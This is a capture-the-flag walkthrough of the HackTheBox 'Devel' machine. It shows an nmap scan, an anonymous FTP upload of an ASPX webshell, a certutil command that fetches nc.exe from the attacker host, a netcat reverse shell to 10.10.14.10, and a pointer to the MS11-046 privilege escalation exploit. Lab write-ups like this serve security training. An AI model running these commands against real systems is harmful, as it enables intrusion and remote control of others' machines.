HackTheBox:Devel

Today we will take a look at HackTheBox:Devel. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

• Network scan

└─# nmap -Pn -p- -sCV --open -oN nmap/open 10.10.10.5
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: IIS7
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

• Reverse Shell

We see that the files on the site are here. Let’s upload in a webshell.

─# locate *aspx
└─# cp /usr/share/davtest/backdoors/aspx_cmd.aspx .
─# ftp 10.10.10.5                                                                                                                 
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> put aspx_cmd.aspx
local: aspx_cmd.aspx remote: aspx_cmd.aspx
229 Entering Extended Passive Mode (|||49158|)
150 Opening ASCII mode data connection.
100% |***********************************************************************************************************************************************************************************************|  1438       22.11 MiB/s    --:-- ETA
226 Transfer complete.
1438 bytes sent in 00:00 (8.94 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||49159|)
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
07-26-22  12:26PM                 1438 aspx_cmd.aspx
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.

Let’s look at webshell.

Now let’s create temp folder. Upload nc.exe and start listening

cd c:\temp && certutil -urlcache -split -f http://10.10.14.10/nc.exe nc.exe
nc.exe 10.10.14.10 4444 -e cmd.exe
c:\temp\nc.exe 10.10.14.10 4444 -e cmd.exe

• System

Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046) 2011-1249 | VK9 Security

And now we are the system

“If you have any questions or comments, please do not hesitate to write. Have a good days”

Elman Alizadeh - Information Security Analyst - R.I.S.K. Company | LinkedIn